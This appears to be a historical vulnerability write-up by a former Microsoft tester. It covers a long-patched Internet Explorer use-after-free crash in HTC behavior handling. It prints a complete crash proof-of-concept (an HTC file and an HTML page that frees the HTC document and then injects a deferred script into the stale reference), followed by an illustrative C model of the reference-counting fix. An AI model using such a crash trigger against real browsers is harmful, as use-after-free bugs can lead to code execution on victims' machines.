This crash involved HTC (HTML Component) files and their cached document objects. By saving a reference to an HTC document, changing the behavior URL to destroy the cached document, and then injecting a script into the now-stale reference, the browser would execute code in a freed context and crash. The pattern relates to a similar bug that was patched much earlier in 2007.
<!-- htcfile.htc -->
<script language="JavaScript">
// First load only: hand the HTC's own document object out to the host page.
// A later HTC instance (loaded under a different URL) leaves this untouched,
// so the host keeps pointing at the first, soon-to-be-destroyed document.
if (!window.htcDocument)
{
window.htcDocument = document;
}
</script>
<!-- index.html -->
<script language="JavaScript">
var htcDocument = false;
function main()
{
// Load the behavior; the HTC stores its document in htcDocument.
document.body.style.behavior = 'url(htcfile.htc?RND=1)';
// A different URL forces a fresh HTC instance, destroying the first document.
setTimeout("document.body.style.behavior = 'url(htcfile.htc?RND=2)';", 100);
// Touch the stale document: the deferred script makes MSHTML walk freed memory.
setTimeout("htcDocument.body.innerHTML = '.<script defer>x=1<\/script>';", 200);
// If it does not crash in the first shot, we will retry.
setTimeout("htcDocument = false; main();", 300);
}
</script>
<input type="button" size="50" onclick="main()" value="CrashMe">
The HTC file sets window.htcDocument to its own document on first load. Changing the behavior URL forces a new HTC instance to load, which destroys the original HTC document. Setting innerHTML with a deferred script on the stale reference then causes CScriptCollection::GetHolderCLSID to walk a freed object, crashing in MSHTML. The crash was rated UNKNOWN exploitability.
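The lifetime mistake above, reduced to a small C model (added here for illustration; it is not MSHTML code and all names are hypothetical): a behavior host owns one HTC document, script keeps a reference to it, and reloading the behavior drops the host's reference. With a raw pointer the script's reference goes stale; with a COM-style AddRef the held reference keeps the document alive until the script releases it.

```c
#include <stdlib.h>
#include <string.h>

/* Modelled HTC document; refs stands in for a COM-style reference count. */
typedef struct { int refs; int alive; char url[64]; } HtcDoc;
/* The behavior host owns exactly one live HTC document at a time. */
typedef struct { HtcDoc *doc; } BehaviorHost;

static HtcDoc *doc_create(const char *url) {
    HtcDoc *d = calloc(1, sizeof *d);
    d->refs = 1;                 /* the host's own reference */
    d->alive = 1;
    strncpy(d->url, url, sizeof d->url - 1);
    return d;
}

/* Drop one reference. Instead of free(), mark the object dead so the model
 * can observe a stale access without undefined behaviour. */
static void doc_release(HtcDoc *d) {
    if (d && --d->refs == 0) d->alive = 0;
}

/* style.behavior = 'url(...)': release the old document, load a new one. */
static void set_behavior(BehaviorHost *h, const char *url) {
    doc_release(h->doc);
    h->doc = doc_create(url);
}

/* window.htcDocument = document. Buggy path: raw pointer, no reference taken.
 * Fixed path: the script takes its own reference (AddRef). */
static HtcDoc *script_hold(BehaviorHost *h, int addref) {
    if (addref) h->doc->refs++;
    return h->doc;
}

/* innerHTML on the saved document: 0 if it is alive, -1 if it is already
 * dead, which is the point where the real browser walked freed memory. */
static int script_inject(HtcDoc *d) { return d->alive ? 0 : -1; }

/* Replays the index.html sequence once; addref selects buggy (0) or fixed (1). */
int run_sequence(int addref) {
    BehaviorHost h = {0};
    set_behavior(&h, "htcfile.htc?RND=1");     /* first load, reference saved */
    HtcDoc *held = script_hold(&h, addref);
    set_behavior(&h, "htcfile.htc?RND=2");     /* host drops the first document */
    int rc = script_inject(held);              /* -1 = stale reference used */
    if (addref) doc_release(held);             /* script done with it */
    doc_release(h.doc);
    free(held); free(h.doc);                   /* always two distinct objects */
    return rc;
}
```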
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.